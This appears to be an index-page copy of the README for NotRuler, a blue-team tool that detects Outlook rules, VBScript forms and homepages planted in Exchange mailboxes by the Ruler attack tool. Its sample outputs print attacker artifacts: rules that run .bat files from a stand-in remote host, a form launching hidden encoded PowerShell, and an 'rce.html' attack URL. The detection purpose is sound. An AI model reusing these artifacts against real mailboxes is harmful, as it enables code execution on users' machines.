Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sensepost/notruler
The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
https://github.com/sensepost/notruler
blue-team security-audit security-tools
Last synced: 2 months ago
JSON representation
The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
- Host: GitHub
- URL: https://github.com/sensepost/notruler
- Owner: sensepost
- License: cc0-1.0
- Created: 2017-09-21T12:35:11.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2017-10-11T07:15:40.000Z (over 6 years ago)
- Last Synced: 2024-01-24T22:36:59.339Z (5 months ago)
- Topics: blue-team, security-audit, security-tools
- Language: Go
- Size: 27.3 KB
- Stars: 89
- Watchers: 13
- Forks: 18
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Lists
- awesome-cybersecurity-blueteam - NotRuler - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. (Windows-based defenses / Overlay and Virtual Private Networks (VPNs))
- awesome-cybersecurity-blueteam - NotRuler - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. (Windows-based defenses / Overlay and Virtual Private Networks (VPNs))
- awesome-blueteam - NotRuler - Detect both client-side rules and VBScript enabled forms used by the [Ruler](https://github.com/sensepost/ruler) attack tool when attempting to compromise a Microsoft Exchange server. (Windows-based defenses / Threat signature packages and collections)
- awesome-cybersecurity-blueteam-cn - NotRuler - 用于侦测尝试破坏Microsoft Exchange服务器的行为,并同时检测由[Ruler](https://github.com/sensepost/ruler)攻击工具使用的客户端规则和启用VBScript的表单 (基于Windows的防护 / 威胁狩猎)
README
# Introduction
NotRuler is the opposite of [Ruler]. The tool aims to make life a little easier for Exchange Admins by allowing for the detection of both client-side rules and VBScript enabled forms. At a miminum this should allow for the detection of all attacks created through [Ruler].
NotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.
## What does it do?
NotRuler can query one or more Exchange mailboxes and detects client-side Outlook rules and VBScript enabled forms.
* Allows Exchange Admins to check for compromise
* Check your own account for compromise
* Extract stager address for Malicious rules
* Extract VBScript used in forms
* Check for 'homepage' and extract URL# Getting Started
Compiled binaries for Linux, OSX and Windows are available. Find these in [Releases]
information about setting up Ruler from source is found in the [getting-started guide].# Usage
NotRuler has two modes of operation:
* Rules -- check for client-side rules
* Forms -- check for VBScript enabled forms
* Homepage -- check for a custom homepage## Rules
The current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the program arguments.
To check multiple mailboxes, create a file with one account per line:
```
[email protected]
[email protected]
[email protected]
[email protected]
```Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules
```You can also check your own account by using ```--self```
```
./notruler --username [email protected] --mailbox [email protected] --self rules
```Sample output:
```
[+] Checking [[email protected]]
[+] Found 5 rules
[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\myhost.somewhere.darkside.com\dav\morebad.bat]
[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\myhost.somewhere.darkside.com\dav\bad.bat]
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
```## Forms
Same as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap "rules" for "forms":
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms
```You can also check your own account by using ```--self```
```
./notruler --username [email protected] --mailbox [email protected] --self forms
```Sample output:
```
[+] Checking [[email protected]]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
CreateObject("Wscript.Shell").Run "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAHgAcABlAGMAVAAxADAAMABDAG8ATgB0AGkATgBVAEUAIA=="[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
```## Homepage
And the same again, you need to either have a list of mailboxes or a single mailbox to check.
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
```
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage
```
You can also check your own account by using ```--self```
```
./notruler --username [email protected] --mailbox [email protected] --self homepage
```
Sample output:
```
[+] Checking [[email protected]]
[WARNING] Found endpoint: http://attack.attackpew.com/rce.html
[+] Webview is set as ENABLED
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
```
# IOCs
I've added a list of IOC's here: [iocs.md](https://github.com/sensepost/notruler/blob/master/iocs.md)
Feel free to submit Issues/PRs with further IOCs!
# License
[![License: CC BY-NC-SA 4.0](https://img.shields.io/badge/License-CC%20BY--NC--SA%204.0-lightgrey.svg)](http://creativecommons.org/licenses/by-nc-sa/4.0/)NotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/) Permissions beyond the scope of this license may be available at http://sensepost.com/contact/.
[Ruler]:
[Releases]: